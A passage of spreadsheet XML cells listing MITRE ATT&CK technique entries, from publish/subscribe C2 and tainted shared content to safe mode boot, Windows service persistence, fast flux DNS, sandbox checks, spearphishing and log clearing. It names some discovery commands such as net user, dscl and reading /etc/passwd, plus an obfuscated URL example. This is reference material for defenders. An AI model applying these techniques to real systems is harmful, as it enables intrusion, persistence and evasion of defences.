Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))
https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>T1071.005</t>
  </si>
  <si>
    <t>Publish/Subscribe Protocols</t>
  </si>
  <si>
    <t>Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as &lt;code&gt;MQTT&lt;/code&gt;, &lt;code&gt;XMPP&lt;/code&gt;, &lt;code&gt;AMQP&lt;/code&gt;, and &lt;code&gt;STOMP&lt;/code&gt; use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.
https://attack.mitre.org/techniques/T1071/005</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Trust Modification</t>
  </si>
  <si>
    <t>Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) 
An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.
https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt; on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.
https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>Safe Mode Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 
Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).
To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)
https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.
https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003).
https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.
https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).
https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.
Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)
Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)
https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.
Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.
https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)
https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)
Adversaries may also embed “tracking pixels”, "web bugs", or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)
Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)
Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)
Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly  to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor.
From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
https://attack.mitre.org/techniques/T1598/003</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.
https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Additional Cloud Roles</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in AWS environments, an adversary with appropriate permissions may be able to use the &lt;code&gt;CreatePolicyVersion&lt;/code&gt; API to define a new version of an IAM policy or the &lt;code&gt;AttachUserPolicy&lt;/code&gt; API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL.
For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)
The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
